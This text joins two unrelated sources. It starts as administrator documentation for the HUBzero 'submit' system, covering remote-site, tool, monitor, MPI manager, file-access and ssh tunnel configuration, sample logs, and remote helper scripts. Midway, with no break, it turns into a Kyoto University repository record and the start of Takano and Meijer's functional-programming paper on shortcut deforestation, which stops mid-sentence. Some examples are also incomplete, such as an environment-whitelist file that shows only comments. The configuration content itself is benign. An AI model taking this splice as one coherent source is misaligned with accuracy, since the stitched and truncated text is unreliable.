Before attempting to configure submit, it is necessary to obtain access to the target remote domain(s). The premise is that a single account on the remote domain will serve as an execution launch point for all HUB end users. It is further assumed that access to this account can be made by direct ssh login or using an ssh tunnel (port forwarding). Having attained account access to one or more remote domains, it is possible to proceed with submit configuration. To get started, the ssh public key generated by the installation should be transferred to the remote domain host(s).

**HUB Configuration**

The behavior of submit is controlled through a set of configuration files. The configuration files contain descriptions of the various parameters required to connect to a remote domain, exchange files, and execute simulation codes. There are separate files for defining remote sites, staged tools, multiprocessor managers, file access controls, permissible environment variables, remote job monitors, and ssh tunneling. Most parameters have default values, and it is not required that all parameters be explicitly defined in the configuration files. A simple example is given for each category of configuration file.

Remote sites are defined in the file sites.dat. Each remote site is defined by a stanza indicating an access mechanism and other account and venue specific information. Defined keywords are:

- **[name]** - site name. Used as command line argument (-v/--venue) and in tools.dat (destinations)
- **venues** - comma separated list of hostnames. If multiple hostnames are listed, one site will be chosen at random.
- **tunnelDesignator** - name of tunnel defined in tunnels.dat.
- **siteMonitorDesignator** - name of site monitor defined in monitors.dat.
- **venueMechanism** - possible mechanisms are ssh and local.
- **remoteUser** - login user at remote site.
- **remoteBatchAccount** - some batch systems require that an account be provided in addition to user information.
- **remoteBatchSystem** - the possible batch submission systems include CONDOR, PBS, SGE, and LSF. SCRIPT may also be specified to indicate that a script will be executed directly on the remote host.
- **remoteBatchQueue** - when remoteBatchSystem is PBS, the queue name may be specified.
- **remoteBatchPartition** - slurm parameter to define the partition for a remote job.
- **remoteBatchPartitionSize** - slurm parameter to define the partition size, currently for BG machines.
- **remoteBatchConstraints** - slurm parameter to define constraints for a remote job.
- **parallelEnvironment** - sge parameter.
- **remoteBinDirectory** - define the directory where shell scripts related to the site should be kept.
- **remoteApplicationRootDirectory** - define the directory where application executables are located.
- **remoteScratchDirectory** - define the top level directory where jobs should be executed. Each job will create a subdirectory under remoteScratchDirectory to isolate jobs from each other.
- **remotePpn** - set the number of processors (cores) per node. The PPN is applied to PBS and LSF job description files. The user may override the value defined here from the command line.
- **remoteManager** - site specific multi-processor manager. Refers to a definition in managers.dat.
- **remoteHostAttribute** - define host attributes. Attributes are applied to PBS description files.
- **stageFiles** - A True/False value indicating whether or not files should be staged to the remote site. If the job submission host and remote host share a filesystem, file staging may not be necessary. Default is True.
- **passUseEnvironment** - A True/False value indicating whether or not the HUB 'use' environment should be passed to the remote site. Default is False. True only makes sense if the remote site is within the HUB domain.
- **arbitraryExecutableAllowed** - A True/False value indicating whether or not execution of arbitrary scripts or binaries is allowed on the remote site. Default is True.
If set to False, the executable must be staged or emanate from /apps. (deprecated)
- **executableClassificationsAllowed** - classifications accepted by the site. Classifications are set in appaccess.dat.
- **members** - a list of site names. Providing a member list gives a layer of abstraction between the user facing name and a remote destination. If multiple members are listed, one will be randomly selected for each job.
- **state** - possible values are enabled or disabled. If not explicitly set, the default value is enabled.
- **failoverSite** - specify a backup site if the site is not available. Site availability is determined by site probes.
- **checkProbeResult** - A True/False value indicating whether or not probe results should determine site availability. Default is True.
- **restrictedToUsers** - comma separated list of user names. If the list is empty, all users may garner site access. User restrictions are applied before group restrictions.
- **restrictedToGroups** - comma separated list of group names. If the list is empty, all groups may garner site access.
- **logUserRemotely** - maintain a log on the remote site mapping HUB id and user to remote batch job id. If not explicitly set, the default value is False.
- **undeclaredSiteSelectionWeight** - used when no site is specified, to choose between sites where selection weight > 0.
- **minimumWallTime** - minimum walltime allowed for the site or queue. Time should be expressed in minutes.
- **maximumWallTime** - maximum walltime allowed for the site or queue. Time should be expressed in minutes.
- **minimumCores** - minimum number of cores allowed for the site or queue.
- **maximumCores** - maximum number of cores allowed for the site or queue.
- **pegasusTemplates** - pertinent pegasus templates for site, rc, and transaction files.

An example stanza is presented for a site that is accessed through ssh.
```bash
$ hostname -f
cluster.campus.edu
$ whoami
yourhub
$ echo ${HOME}
/home/yourhub
$ printenv | grep SCRATCH
CLUSTER_SCRATCH=/scratch/yourhub
```

```
[cluster]
venues = cluster.campus.edu
remotePpn = 8
remoteBatchSystem = PBS
remoteBatchQueue = standby
remoteUser = yourhub
remoteManager = mpich-intel64
venueMechanism = ssh
remoteScratchDirectory = /scratch/yourhub
siteMonitorDesignator = clusterPBS
```

**Tools**

Staged tools are defined in the file `tools.dat`. Each staged tool is defined by a stanza indicating where the tool is staged and any access restrictions. The existence of a staged tool at multiple sites can be expressed with multiple stanzas or multiple destinations within a single stanza. If the tool requires multiple processors, a manager can also be indicated. Defined keywords are:

- **[name]** - tool name. Used as a command line argument to execute staged tools. Repeats are permitted to indicate staging at multiple sites.
- **destinations** - comma separated list of destinations. A destination may exist in `sites.dat` or be a grid site defined by a ClassAd file.
- **executablePath** - path to the executable at the remote site. The path may be given as an absolute path on the remote site or a path relative to `remoteApplicationRootDirectory` defined in `sites.dat`.
- **restrictedToUsers** - comma separated list of user names. If the list is empty, all users may garner tool access. User restrictions are applied before group restrictions.
- **restrictedToGroups** - comma separated list of group names. If the list is empty, all groups may garner tool access.
- **environment** - comma separated list of environment variables in the form `e=v`.
- **remoteManager** - tool specific multi-processor manager. Refers to a definition in `managers.dat`. Overrides the value set by the site definition.
- **state** - possible values are enabled or disabled.
If not explicitly set, the default value is enabled.

An example stanza is presented for a staged tool maintained in the yourhub account on a remote site.

```
[earth]
destinations = cluster
executablePath = ${HOME}/apps/planets/bin/earth.x
remoteManager = mpich-intel

[sun]
destinations = cluster
executablePath = ${HOME}/apps/stars/bin/sun.x
remoteManager = mpich-intel
```

**Monitors**

Remote job monitors are defined in the file monitors.dat. Each remote monitor is defined by a stanza indicating where the monitor is located and how it is to be executed. Defined keywords are:

- **[name]** - monitor name. Used in sites.dat (siteMonitorDesignator)
- **venue** - hostname upon which to launch the monitor daemon. Typically this is a cluster headnode.
- **venueMechanism** - monitoring job launch process. The default is ssh.
- **tunnelDesignator** - name of tunnel defined in tunnels.dat.
- **remoteUser** - login user at remote site.
- **remoteBinDirectory** - define the directory where shell scripts related to the site should be kept.
- **remoteMonitorCommand** - command to launch the monitor daemon process.
- **state** - possible values are enabled or disabled. If not explicitly set, the default value is enabled.

An example stanza is presented for a remote monitor tool used to report the status of PBS jobs.

```
[clusterPBS]
venue = cluster.campus.edu
remoteUser = yourhub
remoteMonitorCommand = ${HOME}/SubmitMonitor/monitorPBS.py
```

**Multi-processor managers**

Multiprocessor managers are defined in the file managers.dat. Each manager is defined by a stanza indicating the set of commands used to execute a multiprocessor simulation run. Defined keywords are:

- **[name]** - manager name. Used in sites.dat and tools.dat.
- **computationMode** - indicate how to use multiple processors for a single job. Recognized values are mpi, parallel, and matlabmpi. Parallel applications that request multiple processes have their own mechanism for inter-process communication. Matlabmpi is used to enable a Matlab implementation of MPI.
- preManagerCommands - comma separated list of commands to be executed before the manager command. A typical use of pre manager commands is to define the environment to include a particular version of MPI and/or compiler, or to set up MPD.
- managerCommand - the manager command, commonly mpirun. It is possible to include strings that will be substituted with values defined from the command line.
- postManagerCommands - comma separated list of commands to be executed when the manager command completes. A typical use would be to terminate an MPD setup.
- mpiRankVariable - environment variable set by the manager command to define process rank. Recognized values are: MPIRUN_RANK, GMPI_ID, RMS_RANK, MXMPI_ID, MSTI_RANK, PMI_RANK, and OMPI_MCA_ns_nds_vpid. If no variable is given, an attempt is made to determine the process rank from command line arguments.
- environment - comma separated list of environment variables in the form e=v.
- moduleInitialize - initialize module script for sh.
- modulesUnload - modules to be unloaded, clearing the way for replacement modules.
- modulesLoad - modules to load to define mpi and other libraries.
- state - possible values are enabled or disabled. If not explicitly set the default value is enabled.

An example stanza is presented for a typical MPI instance. The given commands should be suitable for /bin/sh execution.

```
[mpich-intel]
preManagerCommands = . ${MODULESHOME}/init/sh, module load mpich-intel/11.1.038
managerCommand = mpirun -machinefile ${PBS_NODEFILE} -np NPROCESSORS
```

The token NPROCESSORS is replaced by an actual value at runtime.

**File access controls**

Application or file level access control is described by entries listed in the file appaccess.dat. The ability to transfer files from the HUB to remote sites is granted on a group basis as defined by white and black lists. Each list is given a designated priority and classification. In cases where a file appears on multiple lists, the highest priority takes precedence.
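To illustrate the precedence rule just stated, here is a hypothetical pair of appaccess.dat entries (the group and path names are invented for this sketch). A file under /apps/unreviewed matches both lists, and the higher-priority blacklist entry wins, so the transfer is denied:

```
[public]
whitelist = /apps/.*
priority = 0
classification = apps

[review-board]
blacklist = /apps/unreviewed/.*
priority = 10
classification = apps
```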
Simple wildcard operators are allowed in the filename declaration, allowing for easy listing of entire directories. Each site lists acceptable classification(s) in sites.dat. Defined keywords are

- [group] - group name.
- whitelist - comma separated list of paths. Wildcards allowed.
- blacklist - comma separated list of paths. Wildcards allowed.
- priority - higher priority wins.
- classification - apps or user. user class files are treated as arbitrary executables.
- state - possible values are enabled or disabled. If not explicitly set the default value is enabled.

An example file giving permissions reminiscent of those defined in earlier submit releases is presented here

```
[public]
whitelist = /apps/.*
priority = 0
classification = apps

[submit]
whitelist = ${HOME}/.*
priority = 0
classification = home
```

The group public is intended to include all users. Your system may use a different group such as users for this purpose. The definitions shown here allow all users access to files in /apps where applications are published. Additionally, members of the submit group are allowed to send files from their $HOME directory.

**Environment variables**

Legal environment variables are listed in the file environmentwhitelist.dat. The objective is to prevent end users from setting security sensitive environment variables while allowing application specific variables to be passed to the remote site. Environment variables required to define multiprocessor execution should also be included. The permissible environment variables should be entered as a simple list - one entry per line. An example file allowing use of variables used by OpenMP and MPICH is presented here.

```
# environment variables listed here can be specified from the command line
# with the -e/--env option. Attempts to specify other environment variables
# will be ignored and the values will not be passed to the remote site.
```

**Tunnels**

In some circumstances, access to clusters is restricted such that only a select list of machines is allowed to communicate with the cluster job submission node. The machines that are granted such access are sometimes referred to as gateways. In such circumstances, ssh tunneling or port forwarding can be used to submit HUB jobs through the gateway machine. Tunnel definition is specified in the file tunnels.dat. Each tunnel is defined by a stanza indicating gateway host and port information. Defined keywords are

- [name] - tunnel name.
- venue - tunnel target host.
- venuePort - tunnel target port.
- gatewayHost - name of the intermediate host.
- gatewayUser - login user on gatewayHost.
- localPortOffset - local port offset used for forwarding. The actual port is localPortMinimum + localPortOffset.

An example stanza is presented for a tunnel between the HUB and a remote venue by way of an accepted gateway host.

```
[cluster]
venue = cluster.campus.edu
venuePort = 22
gatewayHost = gateway.campus.edu
gatewayUser = yourhub
localPortOffset = 1
```

**Initialization Scripts and Log Files**

The submit server and job monitoring server must be started as daemon processes running on the submit host. If ssh tunneling is going to be used, an additional server must be started as a daemon process. Each daemon process writes to a centralized log file, facilitating error recording and debugging.

**Initialize daemon scripts**

Scripts for starting the server daemons are provided and installed in /etc/init.d. The default settings for when to start and terminate the scripts are adequate.

**Log files**

Submit processes log information to files located in the /var/log/submit directory tree. The exact location varies depending on the vintage of the installation. Each process has its own log file. The three most important log files are submit-server.log, distributor.log, and monitorJob.log.

**submit-server.log**

The submit-server.log file tracks when the submit server is started and stopped.
Each connection from the submit client is logged with the command line and client IP address reported. All log entries are timestamped and reported by submit-server process ID (PID) or submit ID (ID:) once one has been assigned. Entries from all jobs are simultaneously reported and intermingled. The submit ID serves as a good search key when tracing problems. Examples of startup, job execution, and termination are given here. The job exit status and time metrics are also recorded in the MySQL database JobLog table.

```
[Sun Aug 26 17:28:24 2012] 0: ########################################
[Sun Aug 26 17:28:24 2012] 0: Listening: protocol='tcp', host='', port=830
[Sun Sep 23 12:33:28 2012] (1154) ===============
```

**distributor.log**

The distributor.log file tracks each job as it progresses from start to finish. Details of remote site assignment, queue status, exit status, and command execution are all reported. All entries are timestamped and reported by submit ID. The submit ID serves as the key to join data reported in submit-server.log. An example for submit ID 1659 is listed here. Again, the data for all jobs are intermingled.

```
[Sun Sep 23 00:04:21 2012] 0: quotaCommand = quota -w | tail -n 1
[Sun Sep 23 00:04:21 2012] 1659: command = tar vchf 00001659_01_input.tar --exclude='*.svn*' -C /home/hubzero/user/data/sessions/3984L/./local_jobid.00001659_01 sayhiinquire.dax
[Sun Sep 23 00:04:21 2012] 1659: remoteCommand pegasus-plan --dax ./sayhiinquire.dax
[Sun Sep 23 00:04:21 2012] 1659: workingDirectory /home/hubzero/user/data/sessions/3984L
[Sun Sep 23 00:04:21 2012] 1659: command = tar vrhf 00001659_01_input.
tar --exclude='*.svn*' -C /home/hubzero/user/data/sessions/3984L/00001659/01 00001659_01.sh
[Sun Sep 23 00:04:21 2012] 1659: command = nice -n 19 gzip 00001659_01_input.tar
[Sun Sep 23 00:04:21 2012] 1659: command = /opt/submit/bin/receiveinput.sh /home/hubzero/user/data/sessions/3984L/00001659/01 /home/hubzero/user/data/sessions/3984L/00001659/01/.__timestamp_transferred.00001659_01
[Sun Sep 23 00:04:21 2012] 1659: command = /opt/submit/bin/submitbatchjob.sh /home/hubzero/user/data/sessions/3984L/00001659/01 ./00001659_01.pegasus
[Sun Sep 23 00:04:23 2012] 1659: remoteJobId = 2012.09.23 00:04:22.996 EDT: Submitting job(s).
2012.09.23 00:04:23.002 EDT: 1 job(s) submitted to cluster 946.
2012.09.23 00:04:23.007 EDT:
2012.09.23 00:04:23.012 EDT: -----------------------------------------------------------------------
2012.09.23 00:04:23.017 EDT: File for submitting this DAG to Condor : sayhi_inquire-0.dag.condor.sub
2012.09.23 00:04:23.023 EDT: Log of DAGMan debugging messages : sayhi_inquire-0.dag.dagman.out
2012.09.23 00:04:23.028 EDT: Log of Condor library output : sayhi_inquire-0.dag.lib.out
2012.09.23 00:04:23.033 EDT: Log of Condor library error messages : sayhi_inquire-0.dag.lib.err
2012.09.23 00:04:23.038 EDT: Log of the life of condor_dagman itself : sayhi_inquire-0.dag.dagman.log
2012.09.23 00:04:23.044 EDT:
2012.09.23 00:04:23.049 EDT: -----------------------------------------------------------------------
2012.09.23 00:04:23.054 EDT:
2012.09.23 00:04:23.059 EDT: Your Workflow has been started and runs in base directory given below
2012.09.23 00:04:23.064 EDT:
2012.09.23 00:04:23.070 EDT: cd /home/hubzero/user/data/sessions/3984L/00001659/01/work/pegasus
2012.09.23 00:04:23.075 EDT:
2012.09.23 00:04:23.080 EDT: *** To monitor the workflow you can run ***
2012.09.23 00:04:23.085 EDT:
2012.09.23 00:04:23.090 EDT: pegasus-status -l /home/hubzero/user/data/sessions/3984L/00001659/01/work/pegasus
2012.09.23 00:04:23.096 EDT:
2012.09.23 00:04:23.101 EDT: *** To remove your workflow run
***
2012.09.23 00:04:23.106 EDT: pegasus-remove /home/hubzero/user/data/sessions/3984L/00001659/01/work/pegasus
2012.09.23 00:04:23.111 EDT:
2012.09.23 00:04:23.117 EDT: Time taken to execute is 0.993 seconds
[Sun Sep 23 00:04:23 2012] 1659: status:Job N WF-DiaGrid
[Sun Sep 23 00:04:38 2012] 1659: status:DAG R WF-DiaGrid
[Sun Sep 23 00:10:42 2012] 0: quotaCommand = quota -w | tail -n 1
[Sun Sep 23 00:10:42 2012] 1660: command = tar vchf 00001660_01_input.tar --exclude='*.svn*' -C /home/hubzero/clarksm .__local_jobid.00001660_01 noerror.sh
[Sun Sep 23 00:10:42 2012] 1660: remoteCommand ./noerror.sh
[Sun Sep 23 00:10:42 2012] 1660: workingDirectory /home/hubzero/clarksm
[Sun Sep 23 00:10:42 2012] 1660: command = tar vrhf 00001660_01_input.tar --exclude='*.svn*' -C /home/hubzero/clarksm/00001660/01 00001660_01.sh
[Sun Sep 23 00:10:42 2012] 1660: command = nice -n 19 gzip 00001660_01_input.tar
[Sun Sep 23 00:10:42 2012] 1660: command = /opt/submit/bin/receiveinput.sh /home/hubzero/clarksm/00001660/01 /home/hubzero/clarksm/00001660/01/.__timestamp_transferred.00001660_01
[Sun Sep 23 00:10:42 2012] 1660: command = /opt/submit/bin/submitbatchjob.sh /home/hubzero/clarksm/00001660/01 ./00001660_01.condor
[Sun Sep 23 00:10:42 2012] 1660: remoteJobId = Submitting job(s). 1 job(s) submitted to cluster 953.
[Sun Sep 23 00:10:42 2012] 1660: status:Job N DiaGrid
[Sun Sep 23 00:11:47 2012] 1660: status:Simulation I DiaGrid
[Sun Sep 23 00:12:07 2012] 1660: Received SIGINT!
[Sun Sep 23 00:12:07 2012] 1660: waitForBatchJobs: nCompleteRemoteJobIndexes = 0, nIncompleteJobs = 1, abortGlobal = True
[Sun Sep 23 00:12:07 2012] 1660: command = /opt/submit/bin/killbatchjob.sh 953.0 CONDOR
```

**monitorJob.log**

The monitorJob.log file tracks the invocation and termination of each remotely executed job monitor. The remote job monitors are started on demand when jobs are submitted to remote sites.
The remote job monitors terminate when all jobs complete at a remote site and no new activity has been initiated for a specified amount of time - typically thirty minutes. A typical report should look like:

```
[Sun Aug 26 17:29:16 2012] (1485) ****************************
[Sun Aug 26 17:29:16 2012] (1485) * distributor job monitor started *
[Sun Aug 26 17:29:16 2012] (1485) ****************************
[Sun Aug 26 17:29:16 2012] (1485) loading active jobs
[Sun Aug 26 17:29:16 2012] (1485) 15 jobs loaded from DB file
```

It is imperative that the job monitor be running in order for notification of job progress to occur. If users report that their job appears to hang, check to make sure the job monitor is running. If necessary, take corrective action and restart the daemon.

**monitorTunnel.log**

The monitorTunnel.log file tracks the invocation and termination of each ssh tunnel connection. If users report problems with job submission to sites accessed via an ssh tunnel, this log file should be checked for indication of any possible problems.

**Remote Domain Configuration**

For job submission to remote sites via ssh it is necessary to configure a remote job monitor and a set of scripts to perform file transfer and batch job related functions. A set of scripts can be used for each different batch submission system, or in some cases they may be combined with appropriate switching based on command line arguments. A separate job monitor is needed for each batch submission system. Communication between the HUB and a remote resource via ssh requires inclusion of a public key in the authorized_keys file.

**Job monitor daemon**

A remote job monitor runs as a daemon process and reports batch job status to a central job monitor located on the HUB. The daemon process is started by the central job monitor on demand. The daemon terminates after a configurable amount of inactivity time. The daemon code needs to be installed in the location declared in the monitors.dat file.
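A quick way to verify that the daemon is up is to match its script name against the process table. This is a hypothetical sketch, not part of the submit distribution; the script name monitorPBS.py matches the monitors.dat examples in this document, and on a real installation the check would be run on the remote host (for example wrapped in `ssh yourhub@cluster.campus.edu '...'`):

```shell
# pgrep -f matches against the full command line of running processes.
if pgrep -f monitorPBS.py >/dev/null 2>&1; then
    status="monitor running"
else
    status="monitor not running"
fi
echo "$status"
```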
The daemon requires some initial configuration to declare where it will store log and history files. The daemon does not require any special privileges and runs as a standard user. Typical configuration for the daemon looks like this:

```
$ cat monitors.dat
[clusterPBS]
venue = cluster.campus.edu
remoteUser = yourhub
remoteMonitorCommand = $HOME/Submit/monitorPBS.py
```

The directory defined by MONITORLOGLOCATION needs to be created before the daemon is started. Sample daemon scripts used for PBS, LSF, SGE, Condor, Load Leveler, and Slurm batch systems are included in directory BatchMonitors.

**File transfer and batch job scripts**

Simple scripts are used to manage file transfer and batch job launching and termination. The location of the scripts is entered in sites.dat.

```
$ cat sites.dat
[clusterPBS]
venue = cluster.campus.edu
remoteUser = yourhub
remoteBinDirectory = ${HOME}/bin
```

Example scripts suitable for use with PBS, LSF, Condor, Load Leveler, and Slurm are included in directory Scripts. After modifications are made to monitors.dat the central job monitor must be notified. This can be accomplished by stopping and starting the submon daemon, or a HUP signal can be sent to the monitorJob.py process.

### File transfer - input files

Receive a compressed tar file containing input files required for the job on stdin. The file transferredTimestampFile is used to determine which newly created or modified files should be returned to the HUB.

```
receiveinput.sh jobWorkingDirectory jobScratchDirectory transferredTimestampFile
```

### Batch job script - submission

Submit a batch job using the supplied description file. If arguments beyond the job working directory and batch description file are supplied, an entry is added to the remote site log file. The log file provides a record relating the HUB end user to the remote batch job identifier. The log file should be placed at a location agreed upon by the remote site and HUB.
```
submitbatchjob.sh jobWorkingDirectory jobScratchDirectory jobDescriptionFile
```

The jobId is returned on stdout if job submission is successful. For an unsuccessful job submission the returned jobId should be -1.

**File transfer - output files**

Return a compressed tar file containing job output files on stdout.

```
transmitresults.sh jobWorkingDirectory
```

**File transfer - cleanup**

Remove the job specific directory and any other dangling files.

```
cleanupjob.sh jobWorkingDirectory jobScratchDirectory jobClass
```

**Batch job script - termination**

Terminate the given remote batch job. Command line arguments specify the job identifier and batch system type.

```
killbatchjob.sh jobId jobClass
```

**Batch job script - post process**

For some jobClasses it is appropriate to perform standard post processing actions. An example of such a jobClass is Pegasus.

```
postprocessjob.sh jobWorkingDirectory jobScratchDirectory jobClass
```

**Access Control Mechanisms**

By default tools and sites are configured so that access is granted to all HUB members. In some cases it is desired to restrict access to either a tool or a site to a subset of the HUB membership. The keywords restrictedToUsers and restrictedToGroups provide a mechanism to apply restrictions accordingly. Each keyword should be followed by a comma separated list of userids (logins) or groupids (as declared when creating a new HUB group). If user or group restrictions have been declared, a comparison is made upon invocation of submit between the restrictions and the userid and group memberships. If both user and group restrictions are declared, the user restriction is applied first, followed by the group restriction. In addition to user and group restrictions, another mechanism is provided by the executableClassificationsAllowed keyword in the sites configuration file.
In cases where the executable program is not pre-staged at the remote site, the executable needs to be transferred along with the user supplied inputs to the remote site. Published tools have their executable program located in the /apps/tools/revision/bin directory. For this reason submitted programs that reside in /apps are assumed to be validated and approved for execution. The same cannot be said for programs in other directories. The common case where such a situation arises is when a tool developer is building and testing within the HUB workspace environment. To grant a tool developer permission to submit such arbitrary applications, the site configuration must allow arbitrary executables and the tool developer must be granted permission to send files from their $HOME directory. Discrete permission can be granted on a file-by-file basis in appaccess.dat.
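As a sketch of how these pieces fit together (the group name tooldevs and the value syntax shown for executableClassificationsAllowed are assumptions for illustration, not taken from a real installation; only the relevant keywords of each stanza are shown):

```
# appaccess.dat - grant a developer group permission to send files from
# their home directories; classification user marks them as arbitrary
# executables
[tooldevs]
whitelist = ${HOME}/.*
priority = 0
classification = user

# sites.dat - the target site must also accept the user classification
[cluster]
executableClassificationsAllowed = apps, user
```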
<table> <thead> <tr> <th><strong>Title</strong></th> <th>Shortcut Deforestation in Calculational Form (Theory of Rewriting Systems and Its Applications)</th> </tr> </thead> <tbody> <tr> <td><strong>Author(s)</strong></td> <td>Takano, Akihiko; Meijer, Erik</td> </tr> <tr> <td><strong>Citation</strong></td> <td>数理解析研究所講究録 (1995), 918: 253-267</td> </tr> <tr> <td><strong>Issue Date</strong></td> <td>1995-08</td> </tr> <tr> <td><strong>URL</strong></td> <td><a href="http://hdl.handle.net/2433/59662">http://hdl.handle.net/2433/59662</a></td> </tr> <tr> <td><strong>Type</strong></td> <td>Departmental Bulletin Paper</td> </tr> <tr> <td><strong>Textversion</strong></td> <td>publisher</td> </tr> </tbody> </table> Kyoto University Shortcut Deforestation in Calculational Form * Akihiko Takano Hitachi Advanced Research Lab Hatoyama, Saitama 350-03 Japan takano@harl.hitachi.co.jp Erik Meijer Utrecht University 3508 TB Utrecht The Netherlands erik@cs.ruu.nl Abstract In functional programming, intermediate data structures are often used to "glue" together small programs. Deforestation is a program transformation to remove these intermediate data structures automatically. We present a simple algorithm for deforestation based on two fusion rules for hylomorphism, an expressive recursion pattern. A generic notation for hylomorphisms is introduced, where natural transformations are explicitly factored out, and it is used to represent programs. Our method successfully eliminates intermediate data structures of any algebraic type from a much larger class of compositional functional programs than previous techniques. 1 Introduction In functional programming, programs are often constructed by "gluing" together small components, using intermediate data structures to convey information between them. Such data are constructed in one component and later consumed in another component, but never appear in the result of the whole program. 
The compositional style of programming has many advantages of clarity and a higher level of modularity, but these intermediate data structures give rise to an efficiency problem. Inspired by Turchin's early work on the supercompiler [TNT82, Tur86], Wadler [Wad88] introduced the idea of deforestation to tackle this problem. His algorithm for deforestation eliminates arbitrary tree-like intermediate data structures (including lists) when applied to treeless programs. There have been various attempts to extend his method ([Chi92, Sør94]), but major drawbacks remain. All these algorithms basically have to keep track of all function calls that occurred previously, and suitably introduce a definition of a recursive function on detecting a repetition. This corresponds to the fold step of Burstall and Darlington ([BD77]). The process of keeping track of function calls and the clever control needed to avoid infinite unfolding introduce substantial cost and complexity into the algorithms, which prevents deforestation from being adopted as part of the regular optimizations in any serious compiler for functional languages. Recently two new approaches to deforestation have been proposed [GLPJ93, SF93]. Both of them pick the function fold as a useful template to capture the structure of programs, and apply transformations only to programs written in terms of the fold function. Neither technique requires any global analysis to guarantee termination, and the applicability of their transformation rules can be checked locally. Because their theoretical basis can be found in the study on *Constructive Algorithms* [Mee86, MFP91, Mei92, Fok92, Jeu93], we baptise them as *deforestation in calculational form*. Although the method in [GLPJ93] is limited to the specific data structure of lists, it was shown clearly that this calculation-based deforestation is more practical than the original style deforestation and its extensions.

*Earlier version of this paper was presented at FPCA'95.
By using foldr/build as the basis to standardize the structure of the consuming/producing functions of lists, their transformation is the repetitive application of the single cancellation rule for a pair of foldr and build. Each application of the rule can be seen as a canned application of unfold/simplify/fold in the traditional deforestation. In [GLPJ93] the rule and its correctness proof are given only in the specific context of lists, and the extension to other data structures is simply suggested. Once embedded in the proper theoretical framework it becomes clear how to generalize their method to other data structures. Sheard and Fegaras [SF93] demonstrated that folding can be defined for many algebraic types definable in languages like ML (i.e. mutually recursive sum-of-product types). Their *normalization algorithm* automatically calculates a potentially normalizable fold program (analogous to a treeless program) into its canonical form. The algorithm is essentially based on the so-called fusion theorem, and repetitively replaces the nested application of two fold functions with one fold. They also gave definitions of other recursive forms such as generalized unfolds (the derive function) and primitive recursion together with their corresponding fusion theorems. The normalization algorithms for these recursive patterns were not given. In this paper we show that a single transformation rule (and its dual), the *Acid Rain Theorem* [Mei94], elegantly generalizes foldr/build to *any* algebraic data type. We introduce a generic notation for *hylomorphisms*, which generalizes both folds and unfolds, and use it to represent the structure of programs. We show that the acid rain theorem can be stated as fusion rules for hylomorphisms with no side condition.
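For reference, the list-specific cancellation rule of [GLPJ93] that the acid rain theorem generalizes can be written as a single law, where \( \text{build}\ g = g\ (:)\ [\,] \) abstracts a list producer over the list constructors:

\[ \text{foldr}\ c\ n\ (\text{build}\ g) = g\ c\ n \]

Each application of this law removes one intermediate list; the acid rain theorem provides the analogous cancellation for arbitrary algebraic data types, together with its dual.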
Based on these rules, we introduce a new deforestation algorithm to eliminate intermediate data structures of any algebraic type from a much larger class of compositional functional programs than the deforestation algorithms above. The contribution of this paper is as follows:

- Our technique is applicable to any functional program in compositional style, and removes intermediate data of any algebraic type. We propose a generic notation for *hylomorphisms* to explicitly factor out the natural transformation, and the structure of the program is represented using this notation. Our new representation allows us to state the acid rain theorem and the rules of transformation in a uniform way.
- Our technique is a direct generalization of [GLPJ93]. Thanks to the categorical characterization of data types, the theorem naturally covers the dual of the foldr/build theorem. Our optimization is based on two simple local transformations: the generalization of the foldr/build cancellation rule and its dual. The technique is also cheap and practical to implement in real compilers.
- Our method is more powerful than the method in [GLPJ93] even when restricted to the list data structure. Typically, the function zip, which could not be deforested in both parameters by their method, is no longer an exception. Our method successfully deforests zip in both of its parameters (Section 4.5).
- Our method also generalizes the result of [SF93] by adopting hylomorphism as the basic form to represent programs. Because fold (catamorphism) and unfold (the dual of catamorphism) are instances of hylomorphism, our method does not only work on fold programs but also on programs built up from fold and its dual.¹ Our technique can also be extended to work on primitive recursion.

¹For more info check out the WWW page http://www.cs.utwente.nl/~fokkinga/algorithmics.html

This paper is organized as follows.
In section 2 we review the previous work in program calculation which is the theoretical basis of our method. In section 3 we introduce a triplet notation for hylomorphisms and the fusion rules for them, which are the key rules of our method. In section 4 our transformation algorithm is defined and applied to some examples. In section 5 we discuss related work.

2 Program Calculation

In this section we briefly review the previous work on constructive algorithmics ([MFP91, Mei92, Fok92, Mei94]) and explain some basic facts which provide the theoretical basis of our deforestation algorithm. In this paper our default category \( C \) for types is \( \mathcal{CPO} \), the category of complete partial orders with continuous functions. This choice allows us to handle arbitrary recursive equations in a framework close to lazy functional programming languages.

2.1 Functors

Endofunctors on \( C \) (functors from \( C \) to \( C \)) capture the signature of (algebraic) data types. In this paper we assume that all data types are defined by functors whose operation on functions is continuous. In \( \mathcal{CPO} \) all functors defined using the basic functors below and type functors (map functors) satisfy this condition. The definition of type functors is given in section 2.3. The basic functors we assume are \( \text{id} \) (identity), \( A \) (constants), \( \times \) (product), \( A_\perp \) (strictify) and \( + \) (separated sum). We give the definitions of the product and separated sum functors and related combinators.

Definition 2.1 The product \( A \times B \) of two types \( A \) and \( B \) and its operation on functions are defined as:

\[ A \times B = \{(a, b) \mid a \in A, b \in B\} \]
\[ (f \times g)(a, b) = (f\,a, g\,b) \]

The following combinators (left/right projections and split \( \triangle \)) are related to the product functor:

\[ \text{exl}\,(a, b) = a \]
\[ \text{exr}\,(a, b) = b \]
\[ (f \triangle g)\,a = (f\,a, g\,a) \]

The equation

\[ f \times g = (f \circ \text{exl}) \triangle (g \circ \text{exr}) \]

characterizes their relation.
The standard notation for \( f \vartriangle g \) in category theory is \( \langle f, g \rangle \). Definition 2.2 The separated sum \( A + B \) of two types \( A \) and \( B \) and its operation on functions are defined as: \[ A + B = (\{0\} \times A \cup \{1\} \times B)_\perp \] \[ (f + g)\,\perp = \perp \] \[ (f + g)(0, a) = (0, f\,a) \] \[ (f + g)(1, b) = (1, g\,b) \] The following combinators (left/right injections and junc \( \triangledown \)) are related to the separated sum functor: \[ \text{inl}\,a = (0, a) \] \[ \text{inr}\,b = (1, b) \] \[ (f \triangledown g)\,\perp = \perp \] \[ (f \triangledown g)(0, a) = f\,a \] \[ (f \triangledown g)(1, b) = g\,b \] The equation \[ f + g = (\text{inl} \circ f) \triangledown (\text{inr} \circ g) \] characterizes their relation. The standard notation for \( f \triangledown g \) in category theory is \( [f, g] \). ### 2.2 Data Types as Initial Fixed Points of Functors Let \( F \) be an endofunctor on \( C \). An \( F \)-algebra is a strict function of type \( FA \rightarrow A \). The set \( A \) is called the carrier of the algebra. Dually, an \( F \)-co-algebra is a (not necessarily strict) function of type \( A \rightarrow FA \). An \( F \)-homomorphism \( h : A \rightarrow B \) from \( F \)-algebra \( \varphi : FA \rightarrow A \) to \( \psi : FB \rightarrow B \) is a function which satisfies \( h \circ \varphi = \psi \circ F h \). We use 